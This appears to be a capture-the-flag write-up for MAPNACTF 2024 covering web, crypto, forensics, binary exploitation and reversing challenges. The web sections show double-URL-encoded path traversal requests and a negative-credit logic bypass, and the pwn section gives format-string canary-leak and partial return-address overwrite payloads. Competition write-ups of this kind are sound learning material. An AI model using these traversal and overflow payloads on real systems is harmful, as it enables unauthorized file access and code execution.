owned this note
owned this note
Published
Linked with GitHub
# MAPNACTF 2024
## Web
### Flag Holding
We are given a link to a website with no other resource.
```
http://18.184.219.56:8080
```
Upon opening, I see this:
I modify the request to include a "Referer" request header:
```
curl -H "Referer:http://flagland.internal/" http://18.184.219.56:8080
```
*You can use other request modifying tools too
I got:
Next, i included a "secret" parameter with the url.
```
curl -H "Referer:http://flagland.internal/" "http://18.184.219.56:8080?secret="
```
And then I got:
I analysed the website source and found a hint:
Which means that the answer is `http`.
```
curl -H "Referer:http://flagland.internal/" "http://18.184.219.56:8080?secret=http"
```
Next, I got:
So I change the request method.
```
curl -X FLAG -H "Referer:http://flagland.internal/" "http://18.184.219.56:8080?secret=http"
```
Lastly, I got the flag:
```htmlembedded!
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Flag holding</title>
<style>
body {
background-color: #1a4a5e;
}
.msg {
text-align: center;
font-family: sans-serif;
color: white;
font-size: 40px;
line-height: 500px;
}
</style>
</head>
<body>
<div class="msg" style="">
MAPNA{533m5-l1k3-y0u-kn0w-h77p-1836a2f} </div>
</body>
</html>
```
---
### Novel Reader 1
We are given a docker environment which contains a flask application.
The structure is as follows:
```
ls -R novel-reader
novel-reader:
Dockerfile flag.txt stuff
novel-reader/stuff:
index.html main.py private public static
novel-reader/stuff/private:
A-Secret-Tale.txt
novel-reader/stuff/public:
A-Happy-Tale.txt A-Sad-Tale.txt
novel-reader/stuff/static:
script.js style.css
```
In the flask app:
```python!
if(not name.startswith('public/')):
return {'success': False, 'msg': 'You can only read public novels!'}, 400
buf = readFile(name).split(' ')
```
We can see that a readFile function is present, this might be the gateway to obtaining a flag from a file. This prompted me to use a directory traversal attack.
The only checking done to the path is that it must start with 'public/'.
Therefore, I tried:
```
GET http://3.64.250.135:9000/api/read/public/../../flag.txt
```
However, this didnt work as it gave me a 404 not found error.
This is because there script had a function that decoded the url passed in:
```python!
name = unquote(name)
```
I encoded the url and tried again, but it still gave me a 404 not found error.
```
GET http://3.64.250.135:9000/api/read/public%2F..%2F..%2Fflag.txt
```
This told me that nginx was decoding the urls before it reached the api endpoint.
The solution was to use double encoding so that it bypasses both nginx and the unquote function.
```
GET http://3.64.250.135:9000/api/read/public%252F..%252F..%252Fflag.txt
```
And I got the flag:
```json!
{"msg":"MAPNA{uhhh-1-7h1nk-1-f0r607-70-ch3ck-cr3d17>0-4b331d4b}\n\n... Charge your account to unlock more of the novel!","success":true}
```
---
### Novel Reader 2
Continuing from novel reader 1:
By scanning the private directory in the docker environment, we can see that the file `private/A-Secret-Tale.txt` contains a flag at the second last word in the file.
```
Once a upon time there was a flag. The flag was read like this: MAPNA{test-flag}. FIN.
```
In the main.py file, looking at the line in /api/read api endpoint:
```python!
buf = ' '.join(buf[0:session['words_balance']])+'... Charge your account to unlock more of the novel!'
```
We can see that `buf[0:session['words_balance']]` is getting the first n characters of the string in buf, where n is words_balance.
Therefore, we can exploit Python's negative indexing to allow us to read all characters of buf if we can set `session['words_balance']` to -1.
This is important because buf contains the whole contents of a file.
This prompted me to look for a way to set `session['words_balance']` to -1.
Upon looking at the /api/read api endpoint, I see:
```python!
nwords = request.args.get('nwords')
if(nwords):
nwords = int(nwords[:10])
price = nwords * 10
if(price <= session['credit']):
session['credit'] -= price
session['words_balance'] += nwords
```
I noticed that price wasnt being checked for negative, and that i could input a negative number through the request parameter.
First, I got the current credits and words_balance through /api/stats
```
GET http://3.64.250.135:9000/api/stats
```
```json!
{
"credit": 100,
"words_balance": 1
}
```
Since I currently have 1 word balance, so i pass in -2 to make nwords -1.
```
POST http://3.64.250.135:9000/api/charge?nwords=-2
```
Then, I tried accessing the file:
```
GET http://3.64.250.135:9000/api/read/public/../private/A-Secret-Tale.txt
```
However, I got this response:
```json!
{
"msg": "You can only read public novels!",
"success": false
}
```
By double encoding the filepath again, I got the flag:
```
GET http://3.64.250.135:9000/api/read/public%252F..%252Fprivate%252FA-Secret-Tale.txt
```
```json!
{
"msg": "Once a upon time there was a flag. The flag was read like this: MAPNA{uhhh-y0u-607-m3-4641n-3f4b38571}.... Charge your account to unlock more of the novel!",
"success": true
}
```
---
### Advanced JSON Cutifier
- A JSON Beautifier where you can run commands within it as wel
- You know what you can do with running commands? run functions
- The first step is figuring out what language was used to run the commands
- With that error, we can easily check the error message and figure out the language
- https://stackoverflow.com/questions/57807587/string-interpolation-in-keys-in-jsonnet
- with that out of the way, all theres left is to figure out how to read a file in jsonnet
```
{
"here's the flag": importstr "/flag.txt"
}
```
```
-- Output --
{
"here's the flag": "MAPNA{5uch-4-u53ful-f347ur3-a23f98d}\n\n"
}
```
---
## Cryptography
### What Next 1
We are given two files, `output.txt` and `what_next.py`.
Output.txt
```!
TMP = [...a bunch of numbers that arent relevant here...]
KEY = 23226475334448992634882677537728533150528705952262010830460862502359965393545
enc = 2290064970177041546889165766737348623235283630135906565145883208626788551598431732
```
what_next.py
```python!
#!/usr/bin/env python3
from random import *
from Crypto.Util.number import *
from flag import flag
def encrypt(msg, KEY):
m = bytes_to_long(msg)
c = KEY ^ m
return c
n = 80
TMP = [getrandbits(256) * _ ** 2 for _ in range(n)]
KEY = sum([getrandbits(256 >> _) for _ in range(8)])
enc = encrypt(flag, KEY)
print(f'TMP = {TMP}')
print(f'KEY = {KEY}')
print(f'enc = {enc}')
```
I see that the encrypt function is used to encrypt the flag with the key, and that it performs an XOR operation in the line:
```python!
c = KEY ^ m
```
Since the decryption method for XOR cipher is the same operation as encryption, I wrote this function:
```python!
def decrypt(ciphertext, KEY):
m = KEY ^ ciphertext
return long_to_bytes(m)
```
And then passed in the values:
```python!
print(decrypt(2290064970177041546889165766737348623235283630135906565145883208626788551598431732, 23226475334448992634882677537728533150528705952262010830460862502359965393545))
```
To get the key:
```
b'MAPNA{R_U_MT19937_PRNG_Predictor?}'
```
---
## Forensics
### PLC 1
We are given a .pcap file as follows:
Upon inspecting the packets, I noticed there were padded trailers in some of the Ethernet frames.
I filtered the packets by including only those with trailers:
And then extracted the parts of the flag from the trailers
```
3:Ld_4lW4
5:3__PaAD
1:MAPNA{y
4:yS__CaR
6:d1n9!!}
2:0U_sHOu
```
By rearranging the parts according to the numbers, we get the flag:
```
MAPNA{y0U_sHOuLd_4lW4yS__CaR3__PaADd1n9!!}
```
### Tampered
### XXG
For this one, the file provided (MAPNA.XXG) is a file
Running a program that checks the data of MAPNA.XXG `pngcheck`
This suggest a hidden image within the PNG
By `hexdump`ing the png file, i was able to find the following data
This isnt important, the important one are below at around `0x200080 - 0x2001780`
Which are some broken headers, as well as Gimp Metadata
Which is odd, as Gimp Metadata is found in a _png_ file
Heres how a normal Gimp File looks like:
So i gambled and
- extracted the gimp section
- fixed the gimp header
and then i ran the gimp file
ggwp
---
## Pwnable
### Ninipwn
In this level, we are given a 64 bit excecutable, where it has these security features
The decompiled source looks something like this
```clike=
static char* text_input;
static int text_length;
static char[8] key;
void win(void)
{
// execute /bin/sh
}
void encrypt(char *buf_store,char *input_buf)
{
int i;
for (i = 0; i < text_length; i = i + 1) {
buf_store[i] = *(char *)((long)&key + (long)(i % 8)) ^ buf_store[i];
}
return;
}
void encryption_service(void)
{
char *text_input;
char buf_store [264];
long canary;
printf("Text length: ");
scanf("&d" ,&text_length);
getchar();
if ((text_length < 0) || (0x100 < text_length)) {
puts("Text length must be less than 256");
}
else {
printf("Key: ");
read(0,&key,10);
printf("Key selected: ");
printf((char *)&key);
putchar(10);
printf("Text: ");
text_input = buf_store;
read(0,text_input,(long)text_length);
encrypt(buf_store,text_input);
printf("Encrypted output: ");
write(1,buf_store,(long)text_length);
}
return;
}
int main(void)
{
disable_io_buffering();
puts("XOR encryption service");
encryption_service();
return 0;
}
```
It basically will ask the user for three things in order
1. The text length
2. The key
3. The text
The program will then iterate through the text buffer and encrypt each character of the text with each character for the key.
There are 2 vulnerabilities in the code; A format string vuln at line 31 and a stack buffer overflow from `read(0,&key,10)` at line 29 which will lead to another buffer overflow from `char buf_store [264];`at line 18. The reason is because when we read 10 characters to store at `key` which is meant to only store 8 characters, some of that data will overflow to the `text_length` variable.
The `enctypt` function will read from `text_length` and apply `xor` operations on `text_length` bytes starting from the address at `text_input`, which is only meant to hold 264 bytes, however `text_length` is not garenteed to be < 264 anymore.
We also noticed that the key buffer is stored in BSS, so we cant read its contents when trying to do format string exploit, however, we can read the canary value to leak it, which is at address `0x7fffffffde78` here.
After some trials, we determined that that we needed to offset 312 bytes to read the canary value, as shown here
Now that we know what the canary value is, we can prepare our payload to overwrite the EIP wtih the `win()` function.
I used [this site](https://wiremask.eu/tools/buffer-overflow-pattern-generator/) to determine the offset to the EIP, turrns out it was 280 bytes.
With this information, we can develop our payload like so
```
echo 222 > pipe # text_length
python2 -c "import sys; sys.stdout.write('zzzp\$93%'[::-1] + '\r\n')" > pipe # key to leak canary
python2 -c "import sys; sys.stdout.write('i' * 264 + '\x70\x24\x31\x34\x67\x32\x66x7b\x71\x67'[::-1] + 'i'* 8 + '\x70\x24\x31\x34\x67\x32\x66\x7b\x71\x67'[::-1])" > pipe # xored canary and xored address of win() function
```
As we can see, we are able to run the exploit locally.
However, this wont work in remote because of the PIE attribute of the application, which means the address of `win` function is different every load.
I got stuck here until the challenge ended, however, after knwoing that PIE does not randomize every byte of the address, only bytes 1 - 7 in this case, made these few changes, I was able to get it to work on remote
```
echo 222 > pipe
python2 -c "import sys; sys.stdout.write('%39\$pAAA\x19\x01')" > pipe # change to AAA because I dont want to accidentally overwrite the rest of the EIP address
python2 -c "import sys; sys.stdout.write('i' * 264 + '\xd1\x29\xc2\x4f\x4e\x06\x64\x25'[::-1] + 'i'* 8 + '\x16'[::-1])" > pipe # only overwrite the last byte of the address here.
```
## Reverse Engineering
### Compile Me!
The solution is quite straightforward, copy and paste the source in a editor, but you need to **remove the new line**, compile and run the flag
`gcc main.c ; cat main.c |./a.out `
### Heaverse
The enumeration below shows us that the file is an executable and it is **stripped** and **position independent**, this information is important in reversing it.
```
jun@jun-Latitude-5430:~/mapna/heaverse$ file heaverse
heaverse: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=592d7ee08dcc8bb99a91787129d9c7df69c0fc8a, for GNU/Linux 3.2.0, stripped
```
The objdump below also shows us that there are also sound library functions being called like `snd_pcm_close` , `snd_pcm_write` etc. These function are from the [ALSA C Library interface](https://www.alsa-project.org/alsa-doc/alsa-lib/group___p_c_m.html)
Once we run the program, it plays a series of inconsistent beeping sounds, so that gave me a clue that the key is presented in a morse-code like format. I tried timing the beeps below but it seeme inconsistent and inaccurate.
So, I decide to get more information about the timing via the binary itself. Upon launching the binary, we can run `r` run the program and interrupt it with `Ctrl - c`. On pwndbg, we can run `stack` to see its contents and I noticed **morse code** at address `0x7fffffffdb32`
Using `x/10c 0x7fffffffdb32 - 0x10`, we are able to view the original morse code contents
The code is then put to a morse code translator and we will receive our flag
Google Drive
Gist
Clipboard
Sign in with Wallet
